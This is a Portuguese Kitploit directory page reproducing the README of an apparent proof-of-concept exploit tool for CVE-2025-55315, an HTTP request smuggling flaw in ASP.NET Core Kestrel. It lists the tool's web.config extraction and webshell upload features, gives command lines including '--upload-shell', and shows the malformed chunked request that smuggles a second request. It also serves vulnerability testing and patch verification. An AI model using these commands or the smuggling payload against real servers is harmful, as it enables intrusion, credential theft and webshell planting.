Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55315-PoC-Exploit — Exploit de PoC do CVE-2025-55315 | Kitploit
Ferramentas/GitHubGitHub/zemarkhos/cve-2025-55315-poc-exploit
Scanners de VulnerabilidadesGeração de PayloadsExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubzemarkhos/cve-2025-55315-poc-exploit

CVE-2025-55315-PoC-Exploit

Exploit de PoC do CVE-2025-55315

Ver Repositório
859há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ferramenta de Pentest para CVE-2025-55315

Ferramenta de Exploração de Contrabando de Requisições HTTP para ASP.NET Core Kestrel

Python Version CVE CVSS License


⚠️ AVISO LEGAL

ESTA FERRAMENTA É APENAS PARA TESTES DE SEGURANÇA AUTORIZADOS!

  • Use SOMENTE em sistemas que você possui ou para os quais tenha autorização escrita explícita para testar
  • Acesso não autorizado a sistemas de computador é ILEGAL
  • O criador da ferramenta NÃO é responsável pelo uso indevido
  • Ao usar esta ferramenta, você aceita total responsabilidade legal

📋 Visão Geral

Ferramenta profissional de teste de penetração para CVE-2025-55315 (vulnerabilidade de contrabando de requisições HTTP no ASP.NET Core Kestrel). Esta ferramenta foi projetada para análise de alvo único com capacidades abrangentes de exploração.

O que é a CVE-2025-55315?

Uma vulnerabilidade crítica de contrabando de requisições HTTP no servidor web ASP.NET Core Kestrel (CVSS 9.9/10) que permite que atacantes:

  • Contornem a autenticação
  • Roubem credenciais e tokens de sessão
  • Executem Server-Side Request Forgery (SSRF)
  • Envenenem caches
  • Façam upload de webshells e obtenham execução remota de código

Versões Afetadas:

  • .NET Core 3.0 até .NET 9.0.9
  • Corrigido em: .NET 8.0.21+, 9.0.10+, 10.0.0-rc2+

✨ Recursos

Capacidades Principais

  • ✅ Análise de Alvo Único - Teste de penetração focado em um alvo específico
  • ✅ Descoberta Automática de Endpoints - Descobre endpoints comuns do ASP.NET Core
  • ✅ Teste Manual de Endpoints - Testa endpoints específicos de interesse
  • ✅ Detecção de Vulnerabilidades - Detecção precisa da CVE-2025-55315
  • ✅ Extração de web.config - Lê arquivos de configuração via contrabando de requisições
  • ✅ Upload de Webshell - Capacidade opcional de implantação de webshell
  • ✅ Relatórios Detalhados - Relatórios em formato JSON e texto
  • ✅ Recursos de Segurança - Múltiplas solicitações de confirmação para ações destrutivas

Recursos Técnicos

  • Suporte a HTTP/1.1 e HTTPS
  • Suporte a portas personalizadas
  • Timeouts configuráveis
  • Modo de depuração verboso
  • Saída de terminal com código de cores
  • Ignorar validação de certificado SSL (para testes)

🔧 Instalação

Requisitos

# Python 3.7 or higher
python3 --version

# No external dependencies - uses only standard library

Download

# Clone or download the tool
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit

# Make executable
chmod +x cve_2025_55315_PoC.py

🚀 Início Rápido

Verificação Básica de Vulnerabilidade

python3 cve_2025_55315_PoC.py -t target.com

Isso irá:

  1. Coletar informações do servidor
  2. Descobrir automaticamente endpoints ativos
  3. Testar cada endpoint para a CVE-2025-55315
  4. Exibir resultados no terminal

Testar Endpoint Específico

python3 cve_2025_55315_PoC.py -t target.com -e /api/login

Verificação Completa com Extração de web.config

python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt

Avançado: Exploração Completa (Somente Autorizado!)

python3 cve_2025_55315_PoC.py \
  -t target.com \
  --read-config \
  --upload-shell \
  -v \
  -o full_report.txt

📖 Exemplos de Uso

Exemplo 1: Verificação Rápida

Cenário: Verificar se o servidor de produção está vulnerável

python3 cve_2025_55315_PoC.py -t api.mycompany.com

Duração Esperada: 30-60 segundos


Exemplo 2: Verificação Detalhada

Cenário: Verificação abrangente de endpoints com saída verbosa

python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt

Duração Esperada: 2-5 minutos


Exemplo 3: Testar Múltiplos Endpoints

Cenário: Testar endpoints críticos específicos

python3 cve_2025_55315_PoC.py \
  -t api.mycompany.com \
  -e /api/payment/process \
  -e /api/admin/users \
  -e /api/internal/config \
  -o critical_endpoints.txt

Exemplo 4: Destino Sem SSL

Cenário: Testar servidor HTTP interno

python3 cve_2025_55315_PoC.py \
  -t internal-api.local \
  -p 8080 \
  --no-ssl

📊 Opções de Linha de Comando

usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
                                  [--no-ssl] [--read-config] [--upload-shell]
                                  [-o OUTPUT] [-v] [--timeout TIMEOUT]

Required Arguments:
  -t, --target         Target hostname or URL (e.g., target.com)

Optional Arguments:
  -p, --port           Port number (default: 443 for SSL, 80 for non-SSL)
  -e, --endpoint       Specific endpoint(s) to test (can be used multiple times)
  --no-ssl             Disable SSL/HTTPS (use HTTP)
  --read-config        Attempt to read web.config file
  --upload-shell       Attempt webshell upload (requires confirmation)
  -o, --output         Save report to file
  -v, --verbose        Enable verbose output
  --timeout            Socket timeout in seconds (default: 10)
  -h, --help           Show help message

🔍 Entendendo a Saída

Exemplo de Sistema Vulnerável

Target: old-api.company.com:443
Vulnerable: YES - CRITICAL

--- Server Information ---
  server: Kestrel/8.0.15
  kestrel_detected: True
  http_version: 1.1

--- VULNERABLE ENDPOINTS (2) ---
  ✗ /api/login
    Details: Request smuggling successful - multiple responses
  ✗ /api/health
    Details: Request smuggling successful - multiple responses

--- SUCCESSFUL EXPLOITS ---
  ✓ web.config_read via /api/login

Interpretação:

  • 🔴 VULNERABILIDADE CRÍTICA DETECTADA
  • 🔴 Múltiplos endpoints estão vulneráveis
  • 🔴 O arquivo de configuração foi extraído com sucesso
  • ⚡ URGENTE: Atualize para .NET 8.0.21+ ou 9.0.10+

Exemplo de Sistema Seguro

Target: new-api.company.com:443
Vulnerable: NO - SECURE

--- Server Information ---
  server: Kestrel/9.0.10
  kestrel_detected: True
  http_version: 1.1

[SUCCESS] ✓ Endpoint NOT vulnerable (400 Bad Request)

✓ No vulnerable endpoints found - target may be patched

Interpretação:

  • ✅ O SISTEMA ESTÁ SEGURO
  • ✅ Executando versão corrigida do Kestrel
  • ✅ Todas as requisições malformadas foram rejeitadas

🛡️ Segurança e Ética

Lista de Verificação de Autorização

Antes de executar esta ferramenta, certifique-se de que:

  • Você possui o sistema alvo, OU
  • Você tem autorização por escrito para testar, E
  • A equipe de segurança foi notificada, E
  • Você tem um plano de reversão, E
  • Você entende as implicações legais

Recursos de Segurança Embutidos

  1. Confirmação em duas etapas - A ferramenta solicita autorização antes de iniciar
  2. Confirmação de upload de webshell - Requer digitar "YES" em letras maiúsculas
  3. Limitação de taxa - Atrasos entre requisições durante a descoberta automática
  4. Proteção por timeout - Evita conexões pendentes
  5. Registro detalhado - Todas as ações são registradas para trilha de auditoria

🔬 Detalhes Técnicos

Técnica de Exploração

A ferramenta explora a CVE-2025-55315 usando codificação de transferência em blocos (chunked) malformada:

POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked

2;\n          ← VULNERABILITY: Lone \n instead of \r\n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1    ← This becomes a separate request
Host: target.com
Baixar ferramenta